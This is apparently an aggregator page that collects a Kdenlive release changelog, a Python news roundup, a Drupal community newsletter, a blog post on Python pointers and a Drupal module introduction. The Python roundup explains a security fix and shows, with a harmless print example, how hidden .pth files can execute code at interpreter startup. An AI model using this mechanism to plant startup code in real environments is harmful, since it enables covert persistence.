  • Fix pasting of sequence clips to another document messing clip ids. Commit.
  • Fix python package detection, install in venv. Commit. See issue #1819
  • Another pip fix. Commit.
  • Fix typos in venv pip. Commit.
  • Venv: ensure the python process are correctly started. Commit.
  • Add avfilter dblur xml description to fix param range. Commit.
  • Fix typo. Commit.
  • Correctly ensure pip is installed in venv. Commit.
  • Fix undocked widgets don’t have a title bar to allow moving / re-docking. Commit.
  • Ensure pip is installed inside our venv. Commit.
  • Fix Qt6 dragging clips with subtitle track visible. Commit. Fixes bug #480829
  • Subtitle items don’t have a grouped property – fixes resize bug. Commit. See bug #480383
  • Fix Shift + resize subtitle affecting other clips. Commit.
  • Speech to text : switch to importlib instead of deprecated pkg_resources. Commit.
  • Multi guides export: replace slash and backslash in section names to fix rendering. Commit. Fixes bug #480845
  • Fix moving grouped subtitles can corrupt timeline if doing an invalid move. Commit.
  • Fix sequence corruption on project load. Commit. Fixes bug #480776
  • Fix sort order not correctly restored, store it in project file. Commit. Fixes issue #1817
  • Ensure closed timeline sequences have a transparent background on opening. Commit. Fixes bug #480734
  • Fix Arrow down cannot move to lower track if subtitles track is active. Commit.
  • Enforce refresh on monitor fullscreen switch (fixes incorrectly placed image). Commit.
  • Fix audio lost when replacing clip in timeline with speed change. Commit. Fixes issue #1815
  • Fix duplicated filenames or multiple uses not correctly handled in archiving. Commit. Fixes bug #421567. Fixes bug #456346
  • Fix multiple archiving issues. Commit. Fixes bug #456346
  • Do not hide info message on render start. Commit.
  • Fix Nvidia transcoding. Commit. See issue #1814
  • Fix possible sequence corruption. Commit. Fixes bug #480398
  • Fix sequences folder id not correctly restored on project opening. Commit.
  • Fix duplicate sequence not creating undo entry. Commit. See bug #480398
  • Fix drag clip at beginning of timeline sometimes loses focus. Commit.
  • Fix luma files not correctly checked on document open, resulting in change to luma transitions. Commit. Fixes bug #480343
  • [CD] Run macOS Qt5 only on manual trigger. Commit.
  • Fix group move corrupting undo. Commit. Fixes bug #480348
  • Add FFv1 render preset to replace non working utvideo. Commit.
  • Fix possible crash on layout switch (with Qt in debug mode), fix mixer label overlap. Commit.
  • Hide timeline clip effect button on low zoom. Commit. Fixes issue #1802
  • Fix subtitles not covering transparent zones. Commit. Fixes bug #480350
  • Group resize: don’t allow resizing a clip to length < 1. Commit. Fixes bug #480348
  • Luma fixes: silently autofix luma paths for AppImage projects. Try harder to find matching luma in list, create thumbs in another thread so we don’t block the ui. Commit.
  • Fix crash cutting grouped overlapping subtitles. Don’t allow the cut anymore, add test. Commit. Fixes bug #480316
  • Remove unused var. Commit.
  • Effect stack: don’t show drop marker if drop doesn’t change effect order. Commit.
  • Try to fix crash dragging effect on Mac. Commit.
  • Another try to fix monitor offset on Mac. Commit.
  • Optimize some of the timeline qml code. Commit.
  • Fix DocumentChecker model directly setting items and incorrect call to columnCount() in index causing freeze in Qt6. Commit.
  • Fix clip monitor not updating when clicking in a bin column like date or description. Commit. Fixes bug #480148
  • Ensure we also check “consumer” producers on doc opening (playlist with a different fps). Commit.
  • Fix glaxnimate animation not parsed by documentchecker, resulting in empty animations without warn if file is not found. Commit.
  • Fix NVidia encoding with recent FFmpeg. Commit. See issue #1814
  • Fix clip name offset in timeline for clips with mixes. Commit.
  • Better way to disable building lumas in tests. Commit.
  • Don’t build lumas for tests. Commit.
  • Fix Mac compilation. Commit.
  • Fix data install path on Windows with Qt6. Commit.
  • Fix ridiculously slow recursive search. Commit.
  • Fix start playing at end of timeline. Commit. Fixes bug #479994
  • Try to fix mac monitor vertical offset. Commit.
  • Don’t display useless link when effect category is selected. Commit.
  • Fix save clip zone from timeline adding an extra frame. Commit. Fixes bug #480005
  • Fix clips with mix cannot be cut, add test. Commit. Fixes issue #1809. See bug #479875
  • Fix cmd line rendering. Commit.
  • Windows: fix monitor image vertical offset. Commit.
  • Fix project monitor loop clip. Commit.
  • Add test for recent sequence effect bug. Commit. See bug #479788
  • Fix tests (ensure we don’t try to discard a task twice). Commit.
  • Blacklist MLT Qt5 module when building against Qt6. Commit.
  • Fix monitor offset when zooming back to 1:1. Commit.
  • Fix sequence effects lost. Commit. Fixes bug #479788
  • Avoid white bg label in status bar on startup. Commit.
  • Fix qml warnings. Commit.
  • Fix clicking on clip fade indicator sometimes creating a 2 frames fade instead of defined duration. Commit.
  • Improved fix for center crop issue. Commit.
  • Fix center crop adjust not covering full image. Commit. Fixes bug #464974
  • Fix various Qt6 mouse click issues in monitors. Commit.
  • Disable Movit until it’s stable (should have done that a long time ago). Commit.
  • Fix Qt5 startup crash. Commit.
  • Add time to undo action text. Commit.
  • Fix cannot save list of project files. Commit. Fixes bug #479370
  • Add missing license info. Commit.
  • [Nightly Flatpak] Replace Intel Media SDK by OneVPL Runtime. Commit.
  • [Nightly Flatpak] Fix and update python deps. Commit.
  • [Nightly Flatpak] Switch to Qt6. Commit.
  • Fix editing title clip with a mix can mess up the track. Commit. Fixes bug #478686
  • Use Qt6 by default, fallback to Qt5. Commit.
  • Fix audio mixer cannot enter precise values with keyboard. Commit.
  • [CI] Require tests with Qt6 too. Commit.
  • Add FreeBSD Qt6 CI. Commit.
  • Apply i18n to percent values. Commit.
  • Show GPU in debug info. Commit.
  • Prevent, detect and possibly fix corrupted project files, fix feedback not displayed in project notes. Commit. Fixes issue #1804. See bug #472849
  • [nightly Flatpak] Add patch to fix v4l-utils. Commit.
  • Update copyright to 2024. Commit.
  • [nightly flatpak] fix v4l-utils once more. Commit.
  • [nightly Flatpak] v4l-utils uses meson now. Commit.
  • Don’t crash on first run. Commit.
  • [nightly flatpak] Try to fix v4l-utils. Commit.
  • [nightly flatpak] Cleanup. Commit.
  • Get rid of dropped QtGraphicalEffects. Commit.
  • Fix qml warnings. Commit.
  • Qt6: fix subtitle editing in timeline. Commit.
  • Fix subtitles crashing on project load (incorrectly setting in/out snap points). Commit.
  • Test project’s active timeline is not always the first sequence. Commit.
  • Ensure secondary timelines are added to the project before being loaded. Commit.
  • Ensure autosave is not triggered when project is still loading. Commit.
  • Show GPU name in Wizard. Commit.
  • Avoid converting bin icons to/from QVariant. Commit.
  • [Nightly Flatpak] Update deps. Commit.
  • Fix Qt6 audio / video only clip drag broken from clip monitor. Commit.
  • Fix rubber select incorrectly moving selected items when scrolling the view. Commit.
  • Port away from jobclasses KIO header. Commit.
  • Fix variable name shadowing. Commit.
  • When switching timeline tab without timeline selection, don’t clear effect stack if it was showing a bin clip. Commit.
  • Fix crash pressing del in empty effect stack. Commit.
  • Ensure check for HW accel is also performed if some non essential MLT module is missing. Commit.
  • Fix closed sequences losing properties, add more tests. Commit.
  • Don’t attempt to load timeline sequences more than once. Commit.
  • Fix “Sequence from selection” with single track. Commit.
  • Refactor code for paste. Commit.
  • Fix timeline groups lost after recent commit on project save. Commit.
  • Ensure we always use the correct timeline uuid on some clip operations. Commit.
  • Qt6: fix monitor image vertical offset. Commit.
  • Always keep all timeline models opened. Commit. See bug #478745
  • Add animation: remember last used folder. Commit. See bug #478688
  • Fix KNS KF6 include. Commit.
  • Add missing include. Commit.
  • Refresh effects list after downloading an effect. Commit.
  • Fix crash searching for effect (recent regression). Commit.
  • Fix audio or video only drag of subclips. Commit. Fixes bug #478660
  • Fix editing title clip duration breaks title (recent regression). Commit.
  • Glaxnimate animations: use rawr format instead of Lottie by default. Commit. Fixes bug #478685
  • Effect Stack: remove color icons, fix mouse wheel seeking while scrolling. Commit. See issue #1786
  • Fix timeline focus lost when dropping an effect on a clip. Commit.
  • Disable check for removable devices on Mac. Commit.
  • [CD] Use Qt6 templates instead of custom magic. Commit.
  • Fix type in Purpose KF version check. Commit.
  • Fix dropping lots of clips in Bin can cause freeze on abort. Commit.
  • Right click on a mix now shows a mix menu (allowing deletion). Commit. Fixes bug #442088
  • Don’t add mixes to disabled tracks. Commit. See bug #442088
  • Allow adding a mix without selection. Commit. See bug #442088
  • Fix proxied playlist clips (like stabilized clips) rendered as interlaced. Commit. Fixes bug #476716
  • [CI] Try different approach for macOS signing. Commit.
  • [CI] Signing test, explicitly source env for now. Commit.
  • Camcorder proxies: ensure we have the same count of audio streams and if not, create a new proxy with audio from original clip (Fixes Sony FX6 proxies). Commit.
  • Fix typo. Commit. Fixes issue #1800
  • [CI] Re-enable Flatpak. Commit.
  • [CI] More fixes for the signing test. Commit.
  • [CI] Fixes for the signing test. Commit.
  • [CI] Add macOS signing test. Commit.
  • [CI] Fix pipeline after recent renaming upstream. Commit.
  • Qml warning fixes. Commit.
  • Add subtitle manager to project mneu. Commit.
  • Fix groups tests. Commit.
  • Fix transparency lost on rendering nested sequences. Commit. Fixes bug #477771
  • Fix guides categories not applied on new document. Commit. Fixes bug #477617
  • Fix selecting several individual items in a group. Commit.
  • Add import/export to subtitle track manager. Commit.
  • Drag & drop of effect now applies to all items in a group. Commit. See issue #1327
  • New: select an item in a group with Alt+click. You can then perform operations on that clip only: delete, move. Commit. See issue #1327
  • Consistency: activating an effect in the effects list now consistently applies to all selected items (Bin or Timeline). Commit.
  • Cleanup assets link to documentation. Commit.
  • Check MLT’s render profiles for missing codecs. Commit. See bug #475029
  • Various fixes for python setup. Commit.
  • Fix Qt6 compilation. Commit.
  • FIx incorreclty placed ifdef. Commit.
  • Start integrating some of the new MLT keyframe types. Commit.
  • Various fixes for python venv install. Commit.
  • Fix missing argument in constructor call. Commit.
  • Fix crash on auto subtitle with subtitle track selected. Commit.
  • Fix python install stuck. Commit.
  • Improve timeline clip effect indicator. Commit. See issue #445
  • Work/multisubtitles. Commit.
  • Fix some issues in clip monitor’s last clip menu. Commit.
  • Various fixes and improved feedback for Python venv, add option to run STT on full project. Commit.
  • Text corrections. Commit.
  • Fix typos. Commit.
  • If users try to render a project containing variable framerate clips, show a warning and propose to transcode these clips. Commit.
  • Fix qml warning (incorrect number of args). Commit.
  • Fix qt6 timeline drag. Commit.
  • Flatpak: Use id instead of app-id. Commit.
  • Fix audio stem export. Commit.
  • Add link to our documentation in the effects/composition info. Commit.
  • Qt6: fix monitor background and a few qml mouse issues. Commit.
  • Rename ObjectType to KdenliveObjectType. Commit.
  • We need to use Objective C++ for MetalVideoWidget. Commit.
  • When pasting clips to another project, disable proxies. Commit. Fixes issue #1785
  • Remove unneeded lambda capture. Commit.
  • Fix monitor display on Windows/Qt6. Commit.
  • Cleanup readme and flatpak nightly manifests. Commit.
  • [Nightly Flatpak] Do not build tests. Commit.
  • Fix tests broken by last commit. Commit.
  • Add list of last opened clips in Clip Monitor’s clip name. Commit.
  • Add Craft Jobs for Qt6. Commit.
  • [CI] Switch to new template include format. Commit.
  • [CI] Add reuse-lint job. Commit.
  • Chore: REUSE linting for compliance. Commit.
  • Don’t check for cache space on every startup. Commit.
  • Don’t allow creating profile with non standard and non integer fps from a clip. Commit. See issue #476754
  • Remove unmaintained changelog file. Commit.
  • Automatically check for updates based on the app version (no network connection at this point). Commit.
  • Fix project duration for cli rendering. Commit.
  • Fix clips with missing proxy incorrectly loaded on project opening. Commit.
  • Fix compilation with KF < 5.100. Commit.
  • Add undo redo to text based edit. Commit.
  • Check and remove circular dependencies in tractors. Commit. Fixes bug #471359
  • Hide resize handle on tiny clips with mix. Commit.
  • Fix minor typos. Commit.
  • Adapt to new KFileWidget API. Commit.
  • Fix mix not always deleted when moving grouped clips on same track. Commit.
  • Fix python venv for Windows. Commit.
  • Fix timeremap. Commit.
  • Fix replace clip keeping audio index from previous clip, sometimes breaking audio. Commit. See bug #476612
  • Create sequence from selection: ensure we have enough audio tracks for AV groups. Commit.
  • Fix timeline duration incorrect after create sequence from timeline selection. Commit.
  • Add a Saving Successful event, so people can easily play a sound or show a popup on save if wanted. Commit. See issue #1767
  • Fix project duration not updating when moving the last clip of a track to another non last position. Commit. See bug #476493
  • Update file kdenlive.notifyrc. Commit.
  • Duplicate .notifyrc file to have both KF5 and KF6 versions. Commit.
  • Don’t lose subtitle styling when switching to another sequence. Commit. Fixes bug #476544
  • Port from deprecated ksmserver calls. Commit.
  • Allow aborting clip import operation. Commit.
  • Ensure no urls are added to file watcher when interruping a load operation. Commit.
  • Fix crash dropping url to Library. Commit.
  • When dropping multiple files in project bin, improve import speed by not checking if every file is on a remote drive. Commit.
  • Fix titler shadow incorrectly pasted on selection. Commit. Fixes bug #476393
  • Sequences folder now has a colored icon and is always displayed on top. Commit.
  • Fix Qt5 compilation. Commit.
  • Fix Qt5 compilation take 3. Commit.
  • Fix Qt5 compilation take 2. Commit.
  • Fix Qt5 compilation. Commit.
  • Fix some Qt6 reported warnings. Commit.
  • Fix pasted effects not adjusted to track length. Commit.
  • Python virtual env: Add config tab in the Environement Settings page, minor fixes for the dependencies checks. Commit.
  • [Qt6] We need to link to d3d on Windows. Commit.
  • Convert license headers to SPDX. Commit.
  • Use pragma once for new monitor code. Commit.
  • Fix Qt6 build on Windows. Commit.
  • Text based edit: add font zooming and option to remove all silence. Commit.
  • Move venv to standard xdg location (.local/share/kdenlive). Commit.
  • Whisper now has word timings. Commit.
  • Use python venv to install modules. Commit.
  • Fix timeline preview ignored in temporary data dialog. Commit. Fixes bug #475980
  • Improve debug output for tests. Commit.
  • Correctly prefix python scripts, show warning on failure to find python. Commit.
  • Qt6 Monitor support. Commit.
  • Speech to text: fix whisper install aborting after 30secs. Commit.
  • Don’t try to generate proxy clips for audio with clipart. Commit.
  • Clip loading: switch to Mlt::Producer probe() instead of fetching frame. Commit.
  • Multiple fixes for time remap losing keyframes. Commit.
  • [CI] Increase per test timeout. Commit.
  • Add secondary color correction xml with renamed alphasp0t effect, fix effectgroup showing incorrect names. Commit.
  • Add png with alpha render profile. Commit. See issue #1605
  • Fix Mix not correctly deleted on group track move. Commit. See issue #1726
  • Cleanup commented code. Commit.
  • Fix setting default values is never executed. Commit.
  • Cleanup param insert and placeholder replacement. Commit.
  • Move render argument creation to a function. Commit.
  • Move project init logic out of renderrequest. Commit.
  • Use projectSceneList() for both cli and gui rendering. Commit.
  • Use active timeline for rendering. Commit.
  • Adapt to KBookmarkManager API change. Commit.
  • Small cleanup. Commit.
  • Properly initialize projectItemModel and bin playlist on render request. Commit.
  • Revert “Properly initialize projectItemModel and bin playlist on render request”. Commit.
  • Fix for renamed frei0r effects. Commit.
  • Fix rendering with alpha. Commit.
  • Rotoscoping: don’t auto add a second kfr at cursor pos when creating the initial shape, don’t auto add keyframes until there are 2 keyframes created. Commit.
  • Fix description –render-async flag. Commit.
  • Fix keyframe param not correctly enabled when selecting a clip. Commit.
  • Fix smooth keyframe path sometimes incorrectly drawn on monitor. Commit.
  • Allow setting the default interpolation method for scaling operations on rendering. Commit. Fixes issue #1766
  • Don’t attempt to replace clip resource if proxy job was not completely finished. Commit. Fixes issue #1768
  • Properly initialize projectItemModel and bin playlist on render request. Commit.
  • Rename render params, don’t load project twice. Commit.
  • Remove accelerator on timeline tab rename. Commit. Fixes issue #1769
  • Print render errors for cli rendering too. Commit.
  • Minor cleanup. Commit.
  • Improve exit code on failure. Commit.
  • [cli rendering] Fix condition for subtitle. Commit.
  • Show documentchecker warning only if relevant. Commit.
  • Fix printing of documentchecker results. Commit.
  • [cli renderer] Ensure x265 params are calculated. Commit.
  • Custom clip job: allow using current clip’s frame as parameter. Commit.
  • Properly adjust timeline clips on sequence resize. Commit.
  • Remove unused debug stuff. Commit.
  • Fix project duration not correctly updated on hide / show track. Commit.
  • Custom clip jobs: handle lut file as task output. Commit.
  • Allow renaming a timeline sequence by double clicking on its tab name. Commit.
  • Fix resize clip with mix test. Commit.
  • Fix resize clip start to frame 0 of timeline not correctly working in some zoom levels,. Commit.
  • Remember Clip Monitor audio thumbnail zoom & position for each clip. Commit.
  • Asset List: ensure favorite are shown using a bold font. Commit.
  • Fix asset list using too much height. Commit.
  • Switch Effects/Compositions list to QWidget. Commit.
  • Drop unused and deprecated qmlmodule QtGraphicalEffects. Commit.
  • Fix warning. Commit.
  • Fix multiple audio streams broken by MLT’s new astream property. Commit. Fixes bug #474895
  • Custom clip jobs: ensure we never use the same output name if several tasks are started on the same job. Commit.
  • Custom clip jobs: ensure script exists and is executable. Commit.
  • Fix dialogs not correctly deleted, e.g. add track dialog, causing crash on exit. Commit.
  • Ensure clips with audio (for exemple playlists) don’t block audio when inserted on video track. Commit.
  • Ensure translations cannot mess with file extensions. Commit.
  • Fix another case blocking separate track move. Commit.
  • Fix grabbed clips cannot be moved on upper track in some cases. Commit.
  • Final blocks for enabling render test suite: add synchronous option to exit only after rendering is finished, add option for render preset (use H264 as default). Commit.
  • Implement #1730 replace audio or video of a bin clip in timeline. Commit.
  • Fix cppwarning. Commit.
  • Fix move clip part of a group on another track not always working. Commit.
  • Fix playlist count not correctly updated, allowing to delete last sequence. Commit. Fixes bug #474988
  • Fix motion-tracker Nano file name and links to the documentation. Commit.
  • Stop installing kdenliveui.rc also as separate file, next to Qt resource. Commit.
  • Library: add action to open a library file in a File manager. Commit.
  • Fix tests and possible corruption in recent mix fix. Commit.
  • Correctly highlight newly dropped files in library. Commit.
  • Fix threading issue crashing in resource widget. Commit. Fixes issue #1612
  • Fix freeze on adding mix. Commit. See issue #1751
  • Make Lift work as expected by most users. Commit. Fixes bug #447948. Fixes bug #436762
  • Fix load task discarding kdenlive settings (caused timeline clips to miss the “proxy” icon. Commit.
  • Fix multiple issues with Lift/Gamma/Gain undo. Commit. Fixes bug #472865. Fixes bug #462406
  • Fix freeze / crash on project opening. Commit.
  • COrrectly update effect stack when switching timeline tab. Commit.
  • Drop timeline guides, in favor of sequence clip markers. Commit.
  • Optimize RAM usage by not storing producers on which we did a get_frame operation. Commit.
  • Fix guide multi-export adding an extra dot to the filename. Commit.
  • Open the recursive search from the project file location. Commit.
  • Inform user about time spent on recursive search. Commit.
  • Allow open contained folder in job queue dialog. Commit.
  • Read input and output from command line. Commit.
  • Correctly process configurable render params. Commit.
  • Fix crash on subclip transcoding. Commit. Fixes issue #1753
  • Fix audio extract for multi stream clips. Commit.
  • Correctly set render params for headless rendering. Commit.
  • Ensure some basic parts are built with headless rendering. Commit.
  • Remove unneeded setting of CMake policies, implied by requiring 3.16. Commit.
  • Fix detection/fixing when several clips in the project use the same file. Commit.
  • Render widget: show warning if there is a missing clip in the project. Commit.
  • DocumentChecker: Enable recursive search for clips with proxy but missing source. Commit.
  • Fix rnnoise effect parameters and category. Commit.
  • Fix minor typo. Commit.
  • Fix zone rendering not remembered when reopening a project. Commit.
  • Add missing test file. Commit.
  • Various document checker fixes: fix display update on status change, allow sorting in dialog, hide recreate proxies if source is not available, add test for missing proxy. Commit.
  • Project Bin: don’t draw icon frame if icon size is null. Commit.
  • Fix clips with empty resource not detected by our documentchecker code. Commit.
  • Fix document checker dialog not enabling ok after removing problematic clips. Commit.
  • Document checker dialog: fix selection, allow multiple selection, limit color background and striked out text to a specific column. Commit.
  • Show fade value on drag. Commit. Fixes issue #1744
  • If copying an archived file fails, show which file failed in user message. Commit.
  • Don’t incorrectly treat disabled proxy (-) as missing. Commit. Fixes issue #1748
  • Fix minor typo. Commit.
  • Fix box_blur xml. Commit.
  • Add new “preserve alpha” option to box blur. Commit.
  • Transcoding: add option to replace clip in project (disabled for timeline sequence clips). Commit. See issue #1747
  • Add notr=”true” for text that should not be translated. Commit.
  • When an MLT playlist proxy is missing, it should be reverted to a producer, not stay in a chain. Commit.
  • Adapt to kbookmarks API change. Commit.
  • Adapt to KNotifcations API change. Commit.
  • Try to auto fix path of LUT files on project opening. Commit.
  • Automatically fix missing fonts (like before). Commit.
  • Remove unused ManageCapturesDialog. Commit.
  • [DCResolverDialog] Improve UI. Commit.
  • Fix recursive search and “use placeholder”. Commit.
  • [REUSE] Remove duplicated entry in dep5. Commit.
  • Chore(REUSE): Further linting. Commit.
  • Chore(REUSE): Add headers in data/effects/update. Commit.
  • Chore(REUSE): Add headers in src/ui. Commit.
  • Chore(REUSE): Add missing licence texts. Commit.
  • Chore(reuse): Add missing IP info. Commit.
  • Chore(REUSE): Add SPDX info to CMakelists.txt files. Commit.
  • Add missing include (fix qt6 build). Commit.
  • Don’t duplicate KF_DEP_VERSION + remove unused REQUIRED_QT_VERSION. Commit.
  • Fix configure qt6. Commit.
  • [ColorWheel] Show real color in slider instead of black and white. Commit. See issue #1405
  • Add QColorUtils::complementary. Commit.
  • Add some accessibility names for testing. Commit.
  • Add option to export guides as FFmpeg chapter file. Commit. See bug #451936
  • [Rendering] Further restructuring. Commit.
  • [DocumentResource] Fix workflow with proxies. Commit.
  • Try to fix tests. Commit.
  • [DocumentChecker] Fix and polish after refactoring. Commit.
  • [DocumentChecker] Refactor code to split logic and UI. Commit.
  • [DocumentChecker] Start to split UI and backend code. Commit.
  • Add our mastodon on apps.kde.org. Commit.
  • Fix typo not installing renderer. Commit.
  • Fix tests. Commit.
  • Delete unused var. Commit.
  • Initial (yet hacky) cli rendering. Commit.

The post Kdenlive 24.02.0 released appeared first on Kdenlive.

Categories: FLOSS Project Planets

Real Python: Python News: What's New From February 2024

Planet Python - Mon, 2024-03-11 10:00

As February takes a rare leap forward with an extra day this year, the Python community followed suit!

Python versions 3.12 and 3.11 receive a security fix, and CPython source distributions now document the software supply chain to allow for a more effective vulnerability detection. Another Rust-based tool makes its way into the Python ecosystem, promising exciting improvements to the existing package management system.

Looking ahead, the reveal of the PyCon US 2024 schedule gives us a glimpse into the upcoming Python conference. In other news, the Python Software Foundation launches recurring Office Hours to enhance community support in the Grants Program.

Let’s dive into the biggest Python news from the past month!

Python 3.12 and 3.11 Receive a Security Fix

The Python 3.12.2 and Python 3.11.8 patch versions were released, incorporating hundreds of commits and a host of bug fixes. Aside from that, they both provide a small security fix to an obscure feature of Python that allows for arbitrary code execution.

In a nutshell, this new security fix forbids the processing of hidden path configuration files (.pth) located in a virtual environment’s site-packages/ folder:

venv/ │ ├── bin/ │ ├── include/ │ ├── lib/ │ │ │ └── python3.12/ │ │ │ └── site-packages/ │ │ │ └── .your-hidden.pth │ ├── lib64/ │ └── pyvenv.cfg

On a Unix-like operating system, any file becomes implicitly hidden when its name starts with a leading dot. On Windows, a file needs the corresponding attribute set to be hidden. Note that the directory structure presented above might look slightly different on Windows.

Path configuration files are plain text files that the site module in the Python standard library automatically parses and processes upon the interpreter startup. Historically, these files helped facilitate editable installs and implement hooks into the importing machinery. They essentially let you append extra folders to the Python search path, which is accessible through the sys.path variable.

Unfortunately, .pth files have a quirk that makes it possible to execute any code on startup:

Text venv/lib/python3.12/site-packages/.your-hidden.pth import os; print("This will run on Python startup!") Copied! Read the full article at https://realpython.com/python-news-february-2024/ »

[ Improve Your Python With 🐍 Python Tricks 💌 – Get a short & sweet Python Trick delivered to your inbox every couple of days. >> Click here to learn more and see examples ]

Categories: FLOSS Project Planets

The Drop Times: Fostering Diversity, Equity, and Inclusion in Drupal Community

Planet Drupal - Mon, 2024-03-11 09:04

As we weave through the ups and downs of the evolutionary tides of technology, it's imperative to anchor ourselves in the values that foster an inclusive, equitable, and diverse environment. The essence of the Drupal community lies not just in our exceptional technical prowess but in the collective spirit that champions Diversity, Equity, and Inclusion (DEI). This isn't merely a buzzword; it's the bedrock of innovation, creativity, and growth. 

As Mahatma Gandhi once said,

"Our ability to reach unity in diversity will be the beauty and the test of our civilization." 

Let us embrace this wisdom as we continue to build not just extraordinary products but also a community that reflects the world's vast and vibrant tapestry.

In this journey towards a more inclusive community, we must recognize that DEI is not the responsibility of a select few but a commitment from all of us. Whether you are a developer, stakeholder, or a member of the wider public, your voice matters. Your experiences, perspectives, and contributions shape our community's very fabric. Let's pledge to listen, learn, and act with empathy and understanding. Together, we can create a space that not only drives technological advancement but also mirrors the diverse world we live in.

Last week, celebrating Women's Day, TDT spotlighted notable quotes from women in the Drupal community, sharing their valuable insights and messages with fellow Drupalers. Additionally, the TDT released a special feature authored by Alka Elizabeth titled "Inspiring Inclusion: Celebrating the Women in Drupal | #1", emphasizing the importance of fostering inclusivity. In the article, Fei Lauren notes that,

One major problem is that we talk about DEI too abstractly instead of looking at data to identify problems – often, the data isn't even there. And when data is available, too often we talk about solutions without asking the individuals themselves what they need. We should learn to think about everything we do through the lens of DEI, but if we really want to drive change, we need to learn how to ask the right questions.

Please let us know if any women in the Drupal Community have inspired you and would like us to know and help us spread the word about them. Please share your insights with us at editor@thedroptimes.com. Also, part two will be out soon, so stay tuned.

Now, let's shift the focus and explore some of the latest news stories and articles we covered last week.

I had the opportunity to interact with James Shield and delve into his extensive 15-year journey within the Drupal community through a unique blend of personal interests and professional advancements. Read the full interview here.

Before the commencement of NERD Summit 2024 on March 8th and 9th, I also had the opportunity to discuss the event with its organizer, Rick Hood, and the keynote speaker, Jessica Cobb. Drawing from their valuable insights, I crafted a featured article highlighting NERD Summit 2024  titled "Exploring the Dynamic Landscape of NERD Summit 2024."

Alka Elizabeth penned a feature on  Alex Moreno's initiative to transform Drupal.org by integrating user roles for personalized onboarding, fostering community collaboration, sustainability, and innovation to boost contributions and engagement while also exploring future strategies for a sustainable Drupal and the community's pivotal role in effecting change. Learn more here.

In an exciting collaboration announcement, The Drop Times has partnered with DrupalCamp Ghent 2024, marking their return to Ghent on May 10-11, 2024, as the event's official media partner. We are also the official Media Partner for DrupalCamp Asheville 2024, an important fixture in the Drupal community calendar scheduled from July 12-14.

Developers are invited to submit their Drupal-based projects for consideration in the 2024 Splash Award Germany & Austria, with submissions open until July 31. The awards ceremony, scheduled for November 7 in Berlin, will see experts selecting the winners from the pool of digital projects. For more information, visit this link.

Registration is now available for Drupal Developer Days 2024 in Burgas. Speakers must register on the event's website to submit session proposals, but attendance is open to all without registration.

DrupalCon Portland introduces an exclusive $50 rate for students and recent alumni (from 2022 onwards), extending this discounted offer to individuals from colleges, universities, trade schools, and Drupal training programs. Learn more here.

Drupaljam 2024 announces an early-bird ticket promotion, allowing attendees to secure their spots at the event and save on registration fees until March 31st. More details are available for interested participants here.

Time is running out to submit session proposals for DrupalCon Barcelona 2024, with less than a month left for interested participants to seize the opportunity and share their ideas. Learn more about this here.

Get ready to celebrate coffee and community as the Drupal Coffee Exchange occurs during MidCamp 2024 on Thursday, March 21st, from 2:00 pm to 2:15 pm CDT. Events for the week are here.

Gábor Hojtsy reveals the latest updates on the Drupal 11 release, announcing potential release dates for either the week of July 29 or the week of December 9, 2024, pending completion of beta requirements. To learn more about the release, visit this link.

A critical security update for the Registration Role Module in Drupal has been issued, addressing an access bypass vulnerability affecting versions before 2.0.1. Discovered by Pamela Barone and Renaud Joubert, the flaw stems from a logic error during module upgrades, potentially allowing unauthorized role assignments to new users. Know more about this security update here.

The formation of the Advisory Committee for DrupalCon Barcelona 2024 has been announced, showcasing the combined efforts of diverse volunteers dedicated to ensuring the success of this European Drupal event. For further details about the committee members, visit the provided link.

Alex Moreno unveils a transformative approach to user onboarding, emphasizing enhanced engagement through simplified communication and community contribution incentives. Learn more here.

We acknowledge that there are more stories to share. However, due to selection constraints, we must pause further exploration for now.

To get timely updates, follow us on LinkedIn, Twitter and Facebook. Also, join us on Drupal Slack at #thedroptimes.


Thank you,
Sincerely
Elma John
Sub-editor, TheDropTimes.

Categories: FLOSS Project Planets

Ned Batchelder: Does Python have pointers?

Planet Python - Mon, 2024-03-11 07:27

People sometimes ask, “Does Python have pointers?” I hate to be the typical senior engineer, but this is one of those questions where the answer is, it depends what you mean by pointer.

The classic definition of a pointer is: a variable that holds the address of something else and that you can use to work with that something else. In very broad pseudo-code, it would be something like this:

myvar = SOMETHING;
mypointer = get_address_of(myvar);
print(get_value_via_pointer(mypointer));
## output is SOMETHING

This is useful because we can use a pointer to refer to data, setting the pointer in one part of the code with whatever logic we need to decide what data it should point to. Then elsewhere we can use the pointer without having to know what it’s referring to or how the decision was made. The pointer gives us an indirection that lets us separate concerns and write more modular code.

Many programming languages provide a pointer facility like this. For example, in C, the get_address_of() operation is ampersand, and the get_value_via_pointer() operation is star, and our code snippet would be:

int myvar = 17;
int *mypointer = &myvar;
print_int(*mypointer);      // outputs 17

Other languages like C++, C#, Go, Rust, Pascal, and even Fortran have similar capabilities.

OK, so what about Python? In one sense, Python doesn’t have a pointer concept like this. You could say that get_address_of() is provided by Python’s id() function, since (in CPython at least) it returns the memory address of the data:

myvar = 17
mypointer = id(myvar)   # ** not useful

But Python has no inverse operation: there’s no get_value_via_pointer() that can get you myvar given mypointer.

So Python doesn’t have the classic pair of operations to be able to work with pointers explicitly. But on the other hand, every variable in Python is a pointer, because variables in Python are names that refer to objects.

In Python, our simple example looks like this:

myvar = 17
mypointer = myvar
print(mypointer)    # outputs 17

When someone asks, does Python have pointers, perhaps the best answer is: it doesn’t have explicit pointers like some other languages, but everything is implicitly a pointer. So you have the power of pointers to use when you need them: you can have multiple data structures, then assign a variable to one you choose, and use the variable later. You’ve achieved the separation of “which data” from “work with the data” that pointers provide.

Maybe this is yet another case of Same words, different meanings.

Note:

  • Some languages like C also allow pointer arithmetic to adjust a pointer from one item in an array to another. Python’s references don’t allow for that.
  • Python’s standard library provides ctypes, which is great for interfacing with native C code, exposing details there including C pointers. This does not count as Python having explicit pointers.
Categories: FLOSS Project Planets

ComputerMinds.co.uk: Webform Protected Downloads

Planet Drupal - Mon, 2024-03-11 06:58

I recently produced the first release of the Webform Protected Downloads module that is compatible with Drupal 10. It provides the ability for sites to have 'gated' content which users can download once they have filled out a form for their details. This can convert engaged visitors into leads, set up licenses for customers, or simply validate a user for access to a file. Put simply, as the project's description says, this module could be useful to you if:

  • You want to offer some files for download to either anonymous or registered users
  • You don't want those files to be publicly accessible
  • You want to collect some data before granting access to the files
  • You want to be sure that the user gives a valid email address

One of our clients recently came to us with requirements along these lines for their Drupal 10 site, so I went out looking for suitable solutions. There are several similar modules, but this was the only one that fit these specific needs:

  1. There should be no way for the public to access the files without completing the webform.
  2. There could be more than one file to provide access to from a webform.
  3. The file(s) should be downloaded from the website rather than sent by email.

